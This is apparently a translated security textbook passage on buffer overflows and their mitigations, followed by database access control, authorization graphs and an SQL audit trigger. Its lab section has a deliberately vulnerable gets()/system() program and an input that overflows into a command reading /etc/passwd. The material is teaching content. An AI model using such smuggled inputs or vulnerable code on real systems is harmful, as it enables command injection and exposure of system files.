In the following example, a program defines two adjacent data items in memory: A is an 8-byte string buffer and B is a 2-byte integer. Initially A contains only zero bytes and B contains the value 3. Characters are one byte each. The program now writes the string "excessive" into buffer A, followed by a zero byte marking the end of the string. Because the string length is not checked, the new string overwrites the value of B:
Although the programmer did not intend to modify B, B's value has been replaced by a number formed from the tail of the string. In this example, on a big-endian system using ASCII, the character "e" followed by a zero byte becomes the number 25856.
If B were the last remaining data item defined by the program, writing an even longer string that passed the end of B could cause an error such as a segmentation fault, terminating the process.
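The A/B layout above simulated in code, as an added example not in the original document: an unchecked copy of "excessive" spills into B and turns it into 25856, a copy that runs past the end of the mapped block faults, while the bounded copy from the strncpy fix later in this section leaves B untouched. The class and its method names are constructed for the example.

```python
import struct

class AdjacentMemory:
    """Models the layout from the example: an 8-byte buffer A immediately followed by a
    2-byte big-endian integer B, as one contiguous block of bytes."""
    A_SIZE = 8
    B_SIZE = 2

    def __init__(self, b_value=3):
        self.mem = bytearray(self.A_SIZE + self.B_SIZE)   # A is all zero bytes
        self.set_b(b_value)

    def set_b(self, value):
        self.mem[self.A_SIZE:] = struct.pack(">H", value)

    def get_b(self):
        return struct.unpack(">H", bytes(self.mem[self.A_SIZE:]))[0]

    def get_a(self):
        # Read A the way C would: up to the first NUL, or the whole buffer if none.
        return bytes(self.mem[:self.A_SIZE]).split(b"\0", 1)[0].decode("ascii")

    def strcpy_unchecked(self, text):
        """The unsafe copy: writes every byte of the string plus the terminating NUL at
        offset 0 with no regard for A's length, exactly like C's strcpy."""
        data = text.encode("ascii") + b"\0"
        if len(data) > len(self.mem):
            # Nothing is mapped past B: the write would hit an invalid address.
            raise MemoryError("write past the end of mapped memory (segmentation fault)")
        self.mem[0:len(data)] = data          # spills past A into B when len(data) > 8

    def strcpy_bounded(self, text):
        """The fix: copy at most A_SIZE - 1 bytes and always NUL-terminate, so the
        write can never reach B."""
        data = text.encode("ascii")[: self.A_SIZE - 1] + b"\0"
        self.mem[0:len(data)] = data

def overflow_demo(text="excessive"):
    """(A, B) after an unchecked copy of text into A."""
    m = AdjacentMemory()
    m.strcpy_unchecked(text)
    return m.get_a(), m.get_b()

def bounded_demo(text="excessive"):
    """(A, B) after a bounded copy of text into A."""
    m = AdjacentMemory()
    m.strcpy_bounded(text)
    return m.get_a(), m.get_b()

def segfaults(text):
    """True if the unchecked copy of text runs past the end of the mapped block."""
    try:
        overflow_demo(text)
        return False
    except MemoryError:
        return True

if __name__ == "__main__":
    print("unchecked:", overflow_demo())   # B becomes 25856 ('e' followed by a NUL byte)
    print("bounded:  ", bounded_demo())    # B keeps its value 3
    print("longer string faults:", segfaults("far too long a string"))
```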
d. Stack buffer overflows
Besides modifying unrelated variables, a buffer overflow is often exploited by attackers to make a running program execute arbitrary code they supply. The techniques an attacker uses to take control of a process depend on the memory region in which the buffer resides. For example, the stack is the region where data is temporarily "pushed" onto the top of the stack and later "popped" off to read a variable's value. Typically, when a function begins executing, its temporary data items (local variables) are pushed, and the program can access them for as long as the function runs. There are not only stack overflows but also heap overflows.
In the following example, "X" is data that was on the stack when the program started; the program then calls function "Y", which requires a small amount of memory of its own; "Y" then calls function "Z", which requires a large buffer:
If function "Z" overflows its buffer, it can overwrite data belonging to function Y or to the main program:
This is particularly serious on most systems. Besides ordinary data, the stack also holds the return address, that is, the location in the program that was executing before the current function was called. When the function finishes, its temporary memory is removed from the stack and execution is handed back to the return address. So if the return address is overwritten by a buffer overflow, it will point somewhere else. For an unintentional overflow like the one in the first example, that location will almost certainly be invalid, containing no program instruction, and the process will crash. An attacker, however, can adjust the return address to point at a location of their choosing in a way that compromises system security.
e. Example source code
The C source below shows a common programming error. Once compiled, the program produces a buffer overflow if it is called with a command-line argument that is too long, because the argument is written into a buffer without checking its length.
************
/* overflow.c - demonstrates a buffer overflow */
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strcpy(buffer, argv[1]); /* no length check: 10 or more characters overrun buffer */
return 0;
}
************
Strings of up to 9 characters will not overflow the buffer. Strings of 10 or more characters will overflow it: this is always a bug, though it does not always make the program misbehave or cause a segmentation fault.
The program above can be rewritten safely using strncpy as follows:
********
/* better.c - demonstrates one method of fixing the problem */
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strncpy(buffer, argv[1], sizeof(buffer)); /* copies at most 10 bytes */
buffer[sizeof(buffer) - 1] = '\0';        /* strncpy may leave no terminator */
return 0;
}
*******
f. Exploitation
There are different techniques for exploiting buffer overflows, depending on the computer architecture, the operating system and the memory region. For example, exploiting the heap (used for dynamically allocated variables) is very different from exploiting variables on the stack.
Exploiting stack buffer overflows
A technically skilled and malicious user can exploit stack buffer overflows to manipulate a program in one of the following ways: by overwriting a local variable located near the buffer on the stack to change the program's behaviour in the attacker's favour; or by overwriting the return address in a stack frame, so that when the function returns, execution continues at the address the attacker specified, usually in a buffer containing user-supplied input.
If the address of the user-supplied data is unknown but is known to be held in a register, the return address can be overwritten with the address of an opcode that makes execution jump to the user data. Specifically, if the address of the malicious code is held in register R, then a jump to the location holding the opcode for a jump R, call R (or a similar instruction with the effect of jumping to the address in R) causes the code in the user data to execute. The addresses of suitable opcodes or bytes can be found in memory in dynamic link libraries (DLLs) or in the executable itself. However, the address of the opcode usually must not contain any null character (zero byte), and these addresses can differ between applications and versions of the operating system. The Metasploit project is one database of suitable opcodes, although it lists only opcodes for Microsoft Windows.
Exploiting heap overflows
A buffer overflow in the heap data area is called a heap overflow and can be exploited with techniques different from those for stack overflows. Heap memory is allocated dynamically by applications at run time and typically holds program data. Exploitation is carried out by corrupting this data in specific ways to make the application overwrite internal data structures such as linked-list pointers. The Microsoft JPEG GDI+ vulnerability is a recent example of the danger a heap overflow poses.
Obstacles to exploitation
Processing the buffer before it is read or executed can defeat attempts to exploit a buffer overflow. Such processing can reduce the threat of exploitation but may not prevent it absolutely. Processing may include converting upper case to lower case, removing metacharacters and filtering out strings that contain non-alphanumeric characters. However, there are techniques for evading such filtering and processing: alphanumeric code, polymorphic code, self-modifying code and return-to-libc attacks. The same methods can be used to evade detection by intrusion detection systems.
g. Preventing buffer overflows
Many diverse techniques, each with its own trade-offs, are used to detect or prevent buffer overflows. The most reliable way to avoid or prevent them is to use automatic protection at the programming-language level. However, this kind of protection cannot be applied to legacy code, and technical, business or cultural constraints often demand an unsafe language. The following sections describe the available options and implementations.
Choice of programming language
The choice of programming language can have a profound effect on the occurrence of buffer overflows. As of 2006, C and C++ were among the most popular programming languages, with a vast body of software written in them. C and C++ provide no built-in protection against accessing or overwriting data in any part of memory through invalid pointers; in particular, they do not check that data written to an array (the implementation of a buffer) lies within the bounds of that array.
Note, however, that the C++ standard libraries, the Standard Template Library (STL), provide many safe ways to store data in buffers, and C programmers can create and use similar utilities. As with any other feature of C or C++, each programmer must decide whether to accept the performance limitations in exchange for the potential benefit (program safety).
Some variants of C, such as Cyclone, help prevent buffer overflows further by, for example, attaching size information to arrays. The D programming language uses a variety of techniques to avoid most use of pointers and user-defined bounds checking.

Many other programming languages provide runtime checking that issues a warning or raises an exception where C or C++ would overwrite data. Examples of such languages are varied, from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Nearly all interpreted languages protect against buffer overflows by signalling a well-defined error. Often, where a language provides enough type information to do bounds checking, it offers an option to enable or disable it. Static analysis can remove many dynamic type and bounds checks, but poor implementations and awkward cases can significantly reduce performance. Software engineers must carefully weigh the trade-off between safety and performance when deciding which language to use and how to configure the compiler.
Use of safe libraries
The buffer overflow problem is common in C and C++ because these languages expose low-level representational details of buffers as containers for data types. Buffer overflows must therefore be avoided by maintaining a high degree of correctness in the code that performs buffer management. Using well-written and tested libraries for abstract data types that perform automatic buffer management, including bounds checking, can reduce the occurrence and impact of buffer overflows. In these languages, strings and arrays are the two main data types in which buffer overflows occur, so libraries that prevent overflows in these types can provide most of the necessary coverage. Still, incorrect use of safe libraries can lead to buffer overflows and other vulnerabilities, and of course any bug in the library itself is a vulnerability. "Safe" library implementations include The Better String Library, Arri Buffer API and Vstr. The OpenBSD C library provides the useful strlcpy and strlcat functions, but these are far more limited than full safe-library implementations.
In September 2006, Technical Report 24731 of the C standards committee was published; it describes a set of new functions based on the standard C library's input/output and string handling functions, supplemented with buffer-size parameters.
Stack buffer overflow protection
Stack-smashing protection is the technique used to detect the most common buffer overflows. It checks whether the stack has been altered when a function returns; if it has, the program exits with a segmentation fault. Systems using this technique include Libsafe, StackGuard and the ProPolice patches.
Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH exception handler from being overwritten.

The stack can be protected further by splitting it in two: one part for data and one part for function return addresses. This split is used in the Forth programming language, though it was not a security-motivated design decision. Even so, it is not a complete solution to buffer overflows, since sensitive data other than the return address can still be overwritten.
Executable space protection
Executable space protection is an approach to preventing buffer overflows that stops code from executing on the stack or the heap. An attacker may use a buffer overflow to inject arbitrary code into a program's memory, but with executable space protection any attempt to run that code raises an exception.
Some CPUs support a feature called the NX ("No eXecute") or XD ("eXecute Disabled") bit. Combined with software, these features can be used to mark data pages (such as those holding the stack and heap) as readable but not executable.
Some Unix operating systems (such as OpenBSD and Mac OS X) ship with executable space protection. Optional packages include:
- PaX
- Exec Shield
- Openwall
Newer variants of Microsoft Windows also support executable space protection, under the name Data Execution Prevention. Add-on software includes: SecureStack, OverflowGuard, BufferShield, StackDefender.
Executable space protection does not protect against return-to-libc attacks.
Address space layout randomization
Address space layout randomization (ASLR) is a computer security feature that involves arranging the positions of key data areas (usually including the base of the executable and the positions of the libraries, heap and stack) randomly within a process's address space.
Randomizing the virtual memory addresses at which functions and variables reside makes exploiting a buffer overflow harder, though not impossible. It also forces the attacker to tailor the exploit to each individual system, which foils the attempts of Internet worms. A similar but less effective method is to rebase processes and libraries in the virtual address space.
Deep packet inspection
Deep packet inspection (DPI) can detect remote attempts to exploit buffer overflows at the network perimeter. These techniques can block packets that contain the signature of a known attack or a long series of No-Operation instructions (NOPs, instructions that do nothing); such sequences are commonly used when the location of the attack payload varies slightly.
Packet scanning is not an effective method, because it can only stop known attacks and there are many ways to encode a NOP instruction. Attackers can use alphanumeric, metamorphic and self-modifying shellcode to evade detection by packet scanning.
h. Practice:
Boot Linux from the CD, then write a program with the following content:
#include <stdio.h>
#include <stdlib.h>   /* malloc, system */
int main(void) {
char *name;
char *dangerous_system_command;
name = (char *) malloc(10);
dangerous_system_command = (char *) malloc(128);
/* %d with a pointer is non-portable; kept so the output matches the session below */
printf("Address of name is %d\n", name);
printf("Address of command is %d\n", dangerous_system_command);
sprintf(dangerous_system_command, "echo %s", "Hello world!");
printf("What's your name?");
gets(name);   /* deliberately unsafe: no length check, so input longer than 10 bytes runs into the next heap chunk */
system(dangerous_system_command);
return 0;
}
Save the code as a text file and compile it with gcc:
root@1[Desktop]# gcc buffer.c -o buffer
buffer.c:13:2: warning: no newline at end of file
/tmp/ccefevDP.o(.text+0x82): In function `main':
: warning: the `gets' function is dangerous and should not be used.
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?hao
Hello world!
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?1234567890123456cat /etc/passwd

V.

AN TON D LIU

1. An ton c s d liu
The database of an agency, an enterprise, or a whole sector is usually installed centrally or distributed across servers on the network, and is a shared information resource used by many people. Database systems therefore need mechanisms to control and manage access and retrieval of information so that the data remains secure and intact. The term data security means that database systems must be protected against unauthorized access that modifies or destroys data, whether intentionally or unintentionally. Database systems thus need to be administered and protected centrally in order to guarantee data integrity and data security. Data integrity differs from data security, although the two are closely related, and some of the same measures can serve both. There are many threats to data systems:

- The database is installed centrally or distributed across different geographic locations, and is accessed from different terminals in Client/Server mode.
- Many users access and work on the same database.
- Many kinds of data are downloaded and stored on local machines for use.
- Database systems are accessed through many different data manipulation languages and many different application systems over the same information content.

As a result, the following can occur:

- Unintended mistakes when inserting, updating, or deleting data, or programming errors.
- Unauthorized access with malicious intent: modifying, deleting, or stealing information...
- Technical incidents such as device failures, programming errors...

Data stored in the database must be protected against unauthorized access and against intentional or unintentional destruction when information in the database is updated, modified, or added. There must also be measures to guard against data being entered inconsistently, which seriously affects data integrity.

a. Database security violations.

Malicious forms of access include:

- Unauthorized reading of data.
- Unauthorized modification of data.
- Unauthorized destruction of data...

Database security is concerned with protection against malicious access. Absolute protection of database systems from such access is impossible, but there must be strong measures to prevent most unauthorized access to the database.
b. Levels of database security.
To protect a database, security measures must be taken at several levels of protection, as follows:

- Database system level: depending on the user's requirements, the database administrator grants partial access to the database. Other users may be allowed to run queries but be forbidden to modify data.

- Operating system level: the system level controls the whole operational level of the system. Security at the operating system level is guaranteed by the database system security level. Security in the operating system is enforced at many levels, from assigning passwords for access to the system to isolating the processes that run concurrently in the system. The file system also provides some levels of protection. These topics are covered in detail in courses on operating systems.

- Network level: most database systems allow remote access through terminals. Data security at the network level means preventing theft, copying, and modification of information in transit. Network-level security has achieved many results and is widely applied on the Internet. The list of topics in the catalogue covers the fundamental principles of network security.

- User identification: from the definition of data security it follows that the database management system (DBMS) does not allow a user to perform any operation without the permission of the database administrator. The database administrator must:
  - Define for the system the operations that the user is allowed to perform.
  - Provide a means for the system's users to identify themselves.
  In general, users are granted different rights. These rights may cover reading certain parts of the database, and inserting, deleting, or modifying data. The most common way to identify a user is a password, known only to the system and the user. Passwords are also protected by the system, just like data.

- Physical-level protection: even a trustworthy protection model can be attacked at the database, from breaking passwords to stealing equipment. Theft can be countered quite effectively by encrypting and hiding the data. A highly secure system needs identification methods better than passwords, such as recognising each user through a security guard, or combined with administrative regulations...

- Access checking: for each user the system keeps a record generated from the details of the presentation and verification procedure and the details of the operations that the database administrator has granted to the user. The system checks the legitimacy of every operation a user performs. For example, a request to read the annual evaluation of each employee can only be permitted if the database contains information specifying that the requester must be the director, the head or deputy head of the personnel department, or the office manager. All other subjects not listed in the database are not allowed access. The DBMS checks every user operation for violations of the security constraints, and if there is one the operation must be cancelled. An access constraint in general relates to a part of the database. Since an appropriate privilege exists, suppose the program checks every user request. The program orders the access rights by increasing complexity so that the final decision is reached as quickly as possible.

Security at all levels must be maintained if database security is to be guaranteed. A weakness at a lower level (the physical or human level) can defeat strict security measures at a higher level (the database system level).
c. Privileges when using a database system.
Database access privileges can be divided as follows:
- Legitimate read: the user may read, but not modify, the data contents.
- Legitimate insert: the user may insert new data into the database, but not modify existing data.
- Legitimate modify: the user may modify the data contents, but not delete data.
- Legitimate delete: the user may delete data.
- Permission to create and delete indexes.
- Permission to create new relations.
- Modify structure: permits inserting, modifying, or deleting attributes in relations.
- Legitimate drop: permits deleting relations.

A user may have all of the above rights, or only certain ones. In addition to the forms of permitted data access, we can grant the user permission to modify the structure of the database. Drop and delete differ in that legitimate delete only allows deleting data: if a user deletes all tuples of a relation, the relation still exists but is empty, whereas a dropped relation no longer exists.
To illustrate the nature of the problem, without loss of generality, the following statements are just a few notions of the scope of information protection in database systems, showing the database access levels and the rights granted to each class of users:

- Users allowed unconditional access to the whole database, with every storage and retrieval operation.
- Users not allowed access to any part of the database, with any operation.
- Users who may read part of the contents of their own work in the database, but may not modify or add to it.
- Users who may read part of the contents of their own work in the database, and may modify and add to it.
- Users who may read and modify the employee code, employee full name, and work unit attributes, periodically during the first week of each month.
- Users forbidden to read the annual review attribute; the salary level and salary raise date attributes may be read and modified, all other attributes may only be read. The work may only be done between 9 and 11 o'clock on the days of the last week of the month.
- Users who may use statistical operations on the salary attribute to compute the average salary within each unit. Modifying data is forbidden.
d. Views as a protection mechanism
Views, by redefining the conceptual database, not only make application programming easier and increase logical data independence, but are also used as a protection mechanism. There are two kinds of view. The first kind only allows reading and does not allow modification; this kind is called a read-only view. In many cases the DBA lets one user only read data, while another user may both read and modify or add to it... The second kind of view allows reading and writing the components of the view, and every modification made through the view can be stored in the conceptual schema. Proposed SQL allows read/write views within a certain scope. With this approach the design of application programs is more flexible than with read-only views. However, update operations on read/write views often affect components of the database that are not in the view. For example, in a hierarchical DBMS the view may contain only the root record type and not the dependent records. Deleting an occurrence of this record type forces deletion of the dependent record occurrences as well. This is an illegitimate action, violating the principle that a user may not delete an object they cannot see in the view. Similarly in the network model, a record may be deleted without knowledge of other records outside the view that are related to it. There are many other similar cases. Therefore all DBMSs restrict the right to update views to certain specific cases.
As an example from banking, a clerk needs to know the names of all customers who have loans at several branches. This clerk is not allowed to see the details of the particular loans a customer may have. The clerk's request is denied when accessing the loan relation directly, but may be served through the view cust-loan, which contains only: the customer's name and the branch where the customer has a loan. This view can be defined in SQL as follows:
CREATE VIEW cust-loan AS
(SELECT branch-name, customer-name
FROM borrower, loan
WHERE borrower.loan-number = loan.loan-number)
Suppose the clerk issues the following SQL query:
SELECT *
FROM cust-loan
Thus the clerk is allowed to see the result of the query above, but processing of this query is performed on the relations BORROWER and LOAN. The system must therefore check the clerk's privileges on the query before beginning to process it. Creating a view does not depend on the source relations. A user who creates a view does not receive all privileges on that view. For example, the user has no update privilege on the view if they lack the update privilege on the relations over which the view is defined. If a user creates a view using privileges they have not been granted, the system rejects the request to create the view. In the cust-loan example above, the creator of the view must have the read privilege on both relations BORROWER and LOAN.
e. Granting access privileges
A user who has been granted some database access privileges may pass those privileges on to other users. However, the database administrator must also pay special attention when these privileges circulate among many users, so that they can be revoked at any time.

Figure 1: Database access authorization graph

For example, suppose that initially the database administrator grants the update privilege on the LOAN relation of the bank database to users U1, U2, and U3, who may in turn pass that privilege on to other users. The passing of privileges from one user to another is described by an authorization graph. The graph's nodes are the users, with an edge Ui -> Uj if user Ui grants the update privilege on LOAN to user Uj. The root of the graph is the database administrator. In Figure 1, user U5 was granted the privilege by two users, U1 and U2, while user U4 was granted it only by U1.
A user holds a given access privilege on the database if and only if there is a path from the root of the authorization graph, that is, a path from the database administrator's node to the user's node.
Suppose the database administrator decides to revoke the privileges of user U1. Since user U4 derives its privilege from U1, U4's privilege is also revoked. However, since U5 was granted the privilege by both U1 and U2, the administrator only revokes the grant from U1 to U5, not U2's update privilege on LOAN, and U5 keeps the update privilege on the LOAN relation. If the administrator then revokes U2's update privilege, U5 loses its privilege on the LOAN relation.
Figure 2: An attempt to defeat the revocation of privileges

It can happen that a pair of cunning users tries to defeat the rules for revoking granted privileges. Suppose the authorization graph is as in Figure 2a. Besides the edges from the DBA root to U1, U2, and U3, there are also edges from U2 to U3 and back from U3 to U2. This means that the administrator granted privileges to U1, U2, and U3, U3 also holds privileges granted by U2, and U2 also holds privileges granted by U3. If the database administrator revokes U3's privilege while keeping U2's, U3's access is not lost, because the path from the root to U3 is still connected through U2, as in Figure 2b. If the privileges of both users U2 and U3 are revoked at the same time, the privileges of U2 and U3 still appear to exist, as in Figure 2c. Only when the database administrator removes the edges from U3 to U2 and from U2 to U3 do these privileges cease to exist, since they no longer lie on any path originating from the database administrator.
The database administrator therefore requires that every edge in the authorization graph be connected to a path starting from the root node, that is, from the DBA. The edges from U2 to U3 and back are thus deleted, meaning the privileges from U2 to U3 and vice versa must be revoked, as in Figure 3.

Figure 3: Database access authorization graph
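As an added example, not from the original document, the following Python code models the authorization graph of Figures 1 to 3: users are nodes, each grant is an edge, and a privilege is valid only while a path from the DBA root exists. figure1() replays the U1/U4/U5 revocation, and figure2() shows why the U2 <-> U3 cycle fools a check that only asks "did someone grant it to me?" but not the root-path rule.

```python
from collections import defaultdict

ROOT = "DBA"  # the database administrator is the root of the authorization graph


class AuthorizationGraph:
    """Nodes are users; an edge grantor -> grantee records that grantor
    passed the privilege (update on LOAN in the text) to grantee."""

    def __init__(self):
        self.edges = defaultdict(set)  # grantor -> set of grantees

    def grant(self, grantor, grantee):
        # Only a user who currently holds the privilege may pass it on.
        if grantor != ROOT and not self.has_privilege(grantor):
            raise PermissionError(f"{grantor} cannot grant a privilege it does not hold")
        self.edges[grantor].add(grantee)

    def reachable_from_root(self):
        """All nodes with a path from the DBA (depth-first search)."""
        seen, stack = set(), [ROOT]
        while stack:
            node = stack.pop()
            if node not in seen:
                seen.add(node)
                stack.extend(self.edges.get(node, ()))
        return seen

    def has_privilege(self, user):
        """The rule from the text: a privilege holds iff a root path exists."""
        return user in self.reachable_from_root()

    def naive_has_privilege(self, user):
        """The flawed rule: 'somebody granted it to me' (no root path needed)."""
        return any(user in grantees for grantees in self.edges.values())

    def remove_edge(self, grantor, grantee):
        self.edges[grantor].discard(grantee)

    def cascade(self):
        """Drop every grant made by a user who no longer has a root path,
        which is how the U2 <-> U3 cycle of Figure 2 gets cut (Figure 3)."""
        alive = self.reachable_from_root()
        for user in list(self.edges):
            if user not in alive:
                del self.edges[user]
        return sorted(alive - {ROOT})

    def revoke(self, grantor, grantee):
        """Revoke one grant and cascade; returns the users still privileged."""
        self.remove_edge(grantor, grantee)
        return self.cascade()


def figure1():
    """DBA -> U1, U2, U3; U1 -> U4, U5; U2 -> U5 (Figure 1)."""
    g = AuthorizationGraph()
    for user in ("U1", "U2", "U3"):
        g.grant(ROOT, user)
    g.grant("U1", "U4")
    g.grant("U1", "U5")
    g.grant("U2", "U5")
    after_u1 = g.revoke(ROOT, "U1")  # U4 falls with U1, U5 survives via U2
    after_u2 = g.revoke(ROOT, "U2")  # now U5 loses its last root path
    return after_u1, after_u2


def figure2():
    """DBA -> U1, U2, U3 plus the cycle U2 -> U3 -> U2 (Figure 2a)."""
    g = AuthorizationGraph()
    for user in ("U1", "U2", "U3"):
        g.grant(ROOT, user)
    g.grant("U2", "U3")
    g.grant("U3", "U2")
    g.remove_edge(ROOT, "U3")                   # Figure 2b: U3 still reached via U2
    u3_kept = g.has_privilege("U3")
    g.remove_edge(ROOT, "U2")                   # Figure 2c: both DBA grants gone
    naive = (g.naive_has_privilege("U2"), g.naive_has_privilege("U3"))
    strict = (g.has_privilege("U2"), g.has_privilege("U3"))
    g.cascade()                                 # Figure 3: cycle edges deleted
    cycle_cut = "U2" not in g.edges and "U3" not in g.edges
    return u3_kept, naive, strict, cycle_cut


if __name__ == "__main__":
    print(figure1())  # (['U2', 'U3', 'U5'], ['U3'])
    print(figure2())  # (True, (True, True), (False, False), True)
```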
f. Audit trails

Many database security applications need to maintain an audit trail. An audit trail is a record of all the changes made when performing storage operations such as inserting, deleting, and modifying information in the database, together with the additional information generated during execution. An audit trail makes it possible to trace causes quickly and accurately. For example, if some account is found to be out of balance, the administrator can trace all the updates made to that account to find the incorrect (possibly fraudulent) update and the people who performed it. An audit trail can be created by defining suitable triggers on relation updates (using system-defined values to identify the user name and the time of access). However, many database systems provide convenient, easy-to-use facilities for creating audit trails.
2. Database monitoring and statistics
In a number of projects I have been through, tracking the actions that happen in the database has been an extremely important task; there are many solutions and also many difficulties. Today I introduce a fairly simple yet extremely effective approach; if this article is useful to you, please do not hesitate to contribute your opinions below it.
How will you track changes in the database when users delete or modify data? You have a few possible approaches:
Create a column named isDeleted: at first glance you have to admit this idea is very good. Whenever data in a row is deleted it is not completely removed but only marked. This solves the delete problem, but it runs into the problem of data constraints. Imagine I have a username table organised as follows:
ID-UserName-Password, plus the isDeleted column. And you understand what happens here: USERNAME must be unique in the system. It can only be registered again when someone cancels it or it does not yet exist.
Now I delete username = xyz, meaning username = xyz is isDeleted; afterwards I go on to insert username xyz again.
Now the integrity constraint I have to enforce on the database lies on the isDeleted column: my constraint must require username and isDeleted together to be unique. Great, but in this particular case it is not sound; you have to consider creating a constraint on a column that takes no part in the business of the system, which ought to be avoided.
On the other hand, what happens if I insert username = xyz, then delete it, then create it again, then delete it again?
The problem now is that you always have to check before inserting data. Have you ever asked yourself what constraints in the database are for??
Create a copy of the database: if you have worked with Oracle, you know there is a kind of audit table that Oracle supports to manage inserts, deletes, and updates. It need not be Oracle; in other databases you can easily implement this feature too, simply as follows:
Create a log database identical to the original database, with each table having an additional column, action, for update and delete (insert is your option).
Create a trigger for each table; when there is a change on the original database, it inserts into the log table with the corresponding event.
In my opinion this solution is very good: first, it does not burden our original database; when data is deleted it moves to the log database and does not bloat the original, and obviously querying the original database then gives better speed with less data.
Its problem is that it is hard to manage: you have to write a management program for each table, which is rather cumbersome.

Use a single table as the Audit table.

The script to create this table is as follows:


CREATE TABLE Audit (
    Type       CHAR(1),
    TableName  VARCHAR(128),
    PK         VARCHAR(1000),
    FieldName  VARCHAR(128),
    OldValue   VARCHAR(1000),
    NewValue   VARCHAR(1000),
    UpdateDate datetime,
    UserName   VARCHAR(128))

With this approach, I explain the fields as follows:

- AuditID: an auto-increment id.
- Type: an action, which can be D (Delete), I (Insert), or U (Update).
- TableName: the table on which the action occurred.
- PrimaryKeyField: primary key of the deleted row (for a table with a single primary key; following Agile, if you want something different, customize the code)
- PrimaryKeyValue: value of the primary key column.
- FieldName: the column on which the action occurred.
- OldValue: the old value before the change.
- NewValue: the new value after the change.
- UpdateDate: the date and time the action occurred.
- UserName: the user (I use the system user; use a username from another table if you prefer)

Looking at the result table, you can surely picture the idea.

-- Set up the tables
-- Firstly, we create the audit table.
-- There will only need to be one of these in a database
IF NOT EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[Audit]')
               AND OBJECTPROPERTY(id, N'IsUserTable') = 1)
CREATE TABLE Audit (
    Type       CHAR(1),
    TableName  VARCHAR(128),
    PK         VARCHAR(1000),
    FieldName  VARCHAR(128),
    OldValue   VARCHAR(1000),
    NewValue   VARCHAR(1000),
    UpdateDate datetime,
    UserName   VARCHAR(128))
GO

-- now we will illustrate the use of this tool
-- by creating a dummy test table called TrigTest.
IF EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[trigtest]')
           AND OBJECTPROPERTY(id, N'IsUserTable') = 1)
DROP TABLE [dbo].[trigtest]
GO

CREATE TABLE trigtest (i INT NOT NULL, j INT NOT NULL, s VARCHAR(10), t VARCHAR(10))
GO

--note that for this system to work there must be a primary key to the table
--but then a table without a primary key isn't really a table is it?
ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j)
GO

--and now create the trigger itself. This has to be created for every
--table you want to monitor
CREATE TRIGGER tr_trigtest ON trigtest FOR INSERT, UPDATE, DELETE
AS

DECLARE @bit        INT,
        @field      INT,
        @maxfield   INT,
        @char       INT,
        @fieldname  VARCHAR(128),
        @TableName  VARCHAR(128),
        @PKCols     VARCHAR(1000),
        @sql        VARCHAR(2000),
        @UpdateDate VARCHAR(21),
        @UserName   VARCHAR(128),
        @Type       CHAR(1),
        @PKSelect   VARCHAR(1000)

--You will need to change @TableName to match the table to be audited
SELECT @TableName = 'trigtest'

-- date and user
SELECT @UserName = SYSTEM_USER,
       @UpdateDate = CONVERT(VARCHAR(8), GETDATE(), 112)
                     + ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)

-- Action
IF EXISTS (SELECT * FROM inserted)
    IF EXISTS (SELECT * FROM deleted)
        SELECT @Type = 'U'
    ELSE
        SELECT @Type = 'I'
ELSE
    SELECT @Type = 'D'

--get list of columns
SELECT * INTO #ins FROM inserted
SELECT * INTO #del FROM deleted

--Get primary key columns for full outer join
SELECT @PKCols = COALESCE(@PKCols + ' and', ' on')
                 + ' i.' + c.COLUMN_NAME + ' = d.' + c.COLUMN_NAME
FROM INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
     INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE pk.TABLE_NAME = @TableName
  AND CONSTRAINT_TYPE = 'PRIMARY KEY'
  AND c.TABLE_NAME = pk.TABLE_NAME
  AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

--Get primary key select for insert
SELECT @PKSelect = COALESCE(@PKSelect + '+', '')
                   + '''<' + COLUMN_NAME + '=''+convert(varchar(100), coalesce(i.'
                   + COLUMN_NAME + ',d.' + COLUMN_NAME + '))+''>'''
FROM INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
     INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE pk.TABLE_NAME = @TableName
  AND CONSTRAINT_TYPE = 'PRIMARY KEY'
  AND c.TABLE_NAME = pk.TABLE_NAME
  AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

IF @PKCols IS NULL
BEGIN
    RAISERROR('no PK on table %s', 16, -1, @TableName)
    RETURN
END

SELECT @field = 0,
       @maxfield = MAX(ORDINAL_POSITION)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName

WHILE @field < @maxfield
BEGIN
    SELECT @field = MIN(ORDINAL_POSITION)
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION > @field
    SELECT @bit = (@field - 1) % 8 + 1
    SELECT @bit = POWER(2, @bit - 1)
    SELECT @char = ((@field - 1) / 8) + 1
    IF SUBSTRING(COLUMNS_UPDATED(), @char, 1) & @bit > 0 OR @Type IN ('I', 'D')
    BEGIN
        SELECT @fieldname = COLUMN_NAME
        FROM INFORMATION_SCHEMA.COLUMNS
        WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION = @field
        SELECT @sql = 'insert Audit (Type, TableName, PK, FieldName, OldValue, NewValue, UpdateDate, UserName)'
            + ' select ''' + @Type + ''','
            + '''' + @TableName + ''','
            + @PKSelect + ','
            + '''' + @fieldname + ''''
            + ',convert(varchar(1000),d.' + @fieldname + ')'
            + ',convert(varchar(1000),i.' + @fieldname + ')'
            + ',''' + @UpdateDate + ''''
            + ',''' + @UserName + ''''
            + ' from #ins i full outer join #del d' + @PKCols
            + ' where i.' + @fieldname + ' <> d.' + @fieldname
